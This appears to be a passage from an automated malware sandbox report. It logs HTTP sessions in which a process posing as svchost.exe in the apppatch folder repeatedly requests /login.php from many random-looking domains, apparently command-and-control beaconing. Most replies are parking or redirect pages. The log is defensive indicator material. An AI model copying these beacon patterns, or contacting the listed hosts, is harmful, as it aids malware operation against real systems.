                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.468385935 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 64052 | 188.114.97.3 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:10.223046064 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Nov 11, 2024 18:25:10.891809940 CET | 961 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 11 Nov 2024 17:25:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://lysyvan.com/login.php
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvZ3htjN%2FstHfLAPNn%2BTxHL6ZeUx4rihYagq2EFcJe7gpnqB0sKs0oBOmXyCH33TGnI4IHsVz06c5IU6oVXkVC4cxDdwEE6xMUjbKXeaID7jOXthoUlSa14UVqtaGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffae52eeb8c23-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:25:10.892375946 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Nov 11, 2024 18:25:14.402524948 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Nov 11, 2024 18:25:14.823067904 CET | 972 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 11 Nov 2024 17:25:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://lysyvan.com/login.php
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBAlrvTnig7QvNI1InQUawsK2kdPFyMeOSGgczpnrE5hnf2Uu6KXO7e5drwEv7IksacD809Rg0DkM4le2kxAhJfQ%2Fl6NG40RU7G8E7cUweYba8ZLPNsYG3G4araD6A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffafd4e358c23-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1494&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=2527050&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 64053 | 18.208.156.248 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:10.323898077 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupycag.com
Nov 11, 2024 18:25:10.751981974 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:25:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e76c610be23577b8805859f89c813957|66.23.206.109|1731345910|1731345910|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.10 | 64054 | 3.94.10.34 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:10.352009058 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lygynud.com
Nov 11, 2024 18:25:10.778263092 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:25:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=194e3c592d83e2fafc75e712f919f069|66.23.206.109|1731345910|1731345910|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.10 | 64055 | 103.150.10.48 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:10.805753946 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyrysor.com
Nov 11, 2024 18:25:11.599545956 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty/1.15.8.1
Date: Mon, 11 Nov 2024 17:25:11 GMT
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:25:12.403079033 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyrysor.com
Nov 11, 2024 18:25:12.707199097 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
Server: openresty/1.15.8.1
Date: Mon, 11 Nov 2024 17:25:12 GMT
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.10 | 64057 | 106.15.232.163 | 8000 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:11.608824015 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:25:12.401871920 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:25:12.708832979 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
Nov 11, 2024 18:25:12.975815058 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.10 | 64059 | 76.223.67.189 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.385380983 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qexyhuv.com
Nov 11, 2024 18:25:17.819880962 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.10 | 64060 | 103.224.212.210 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.388879061 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
Nov 11, 2024 18:25:17.941569090 CET | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731345917.6190825; expires=Thu, 09-Nov-2034 17:25:17 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.10 | 64061 | 103.224.182.252 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.443842888 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vofycot.com
Nov 11, 2024 18:25:18.030930042 CET | 338 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1731345917.8924867; expires=Thu, 09-Nov-2034 17:25:17 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.10 | 64062 | 64.225.91.73 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.518142939 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galynuh.com
Nov 11, 2024 18:25:18.068305016 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:17 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.10 | 64063 | 154.85.183.50 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.591176987 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Nov 11, 2024 18:25:18.433862925 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:25:18.441287041 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Nov 11, 2024 18:25:18.727142096 CET | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:25:18 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.10 | 64064 | 44.221.84.105 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:17.617278099 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyciz.com
Nov 11, 2024 18:25:18.054240942 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:25:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c3e1f0e6e0584abd0bc83df95f47ca55|66.23.206.109|1731345917|1731345917|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.10 | 64066 | 199.59.243.227 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:18.306725025 CET | 350 | OUT | GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww25.lyxynyx.com
Connection: Keep-Alive
Cookie: __tad=1731345917.6190825
Nov 11, 2024 18:25:18.733654976 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:25:18 GMT
content-type: text/html; charset=utf-8
content-length: 1230
x-request-id: ed2afce1-d041-4af4-9384-1498c5b0f22d
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HAogJtDpOH16p/FqYdcQhKLKPazJH5rZI/wib/rsZ1jGaaSbU5YopXYy+dKaUFMHEQcbbWISvq6Gyhxpr6Tg7A==
set-cookie: parking_session=ed2afce1-d041-4af4-9384-1498c5b0f22d; expires=Mon, 11 Nov 2024 17:40:18 GMT; path=/
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HAogJtDpOH16p/FqYdcQhKLKPazJH5rZI/wib/rsZ1jGaaSbU5YopXYy+dKaUFMHEQcbbWISvq6Gyhxpr6Tg7A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.10 | 64067 | 64.190.63.136 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:18.355942965 CET | 348 | OUT | GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww16.vofycot.com
Connection: Keep-Alive
Cookie: __tad=1731345917.8924867
Nov 11, 2024 18:25:18.981504917 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:25:18 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RRjnQMnhlA3V1i3bEh29EhpkAlrnRBAUfJ2umOjIcPnFy0BAhbsnPAiBPZkhHdNcd2mCxkLBRJ8JZPz5F6iwxw==
last-modified: Mon, 11 Nov 2024 17:25:18 GMT
x-cache-miss-from: parking-7596689c44-jngxs
server: Parking/1.0
                                                                                                                                                                                                            Data Ascii: 4F56<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RRjnQMnhlA3V1i3bEh29EhpkAlrnRBAUfJ2umOjIcPnFy0BAhbsnPAiBPZkhHdNcd2mCxkLBRJ8JZPz5F6iwxw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and be
                                                                                                                                                                                                            Data Ascii: _header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-blo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.10 | 62373 | 64.225.91.73 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:19.867218018 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyhyg.com
Nov 11, 2024 18:25:20.416307926 CET | 816 | IN | HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Mon, 11 Nov 2024 17:25:20 GMT
content-type: text/html
content-length: 593
last-modified: Wed, 22 Feb 2023 21:25:52 GMT
etag: "63f68860-251"
accept-ranges: bytes
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.10 | 61300 | 72.52.179.174 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:20.162610054 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.10 | 61301 | 72.52.179.174 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:20.681967974 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.10 | 57974 | 52.34.198.229 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:24.806463003 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lygyvuj.com
Nov 11, 2024 18:25:25.491776943 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:25:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0a88dfa3b6493a0c324de365a805e3ad|66.23.206.109|1731345925|1731345925|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.10 | 57481 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:27.973712921 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyhiz.com
Nov 11, 2024 18:25:28.402127981 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:25:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=91e6f4c6961727ea7e4b7793cd95b6ef|66.23.206.109|1731345928|1731345928|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.10 | 62042 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:29.548319101 CET | 305 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
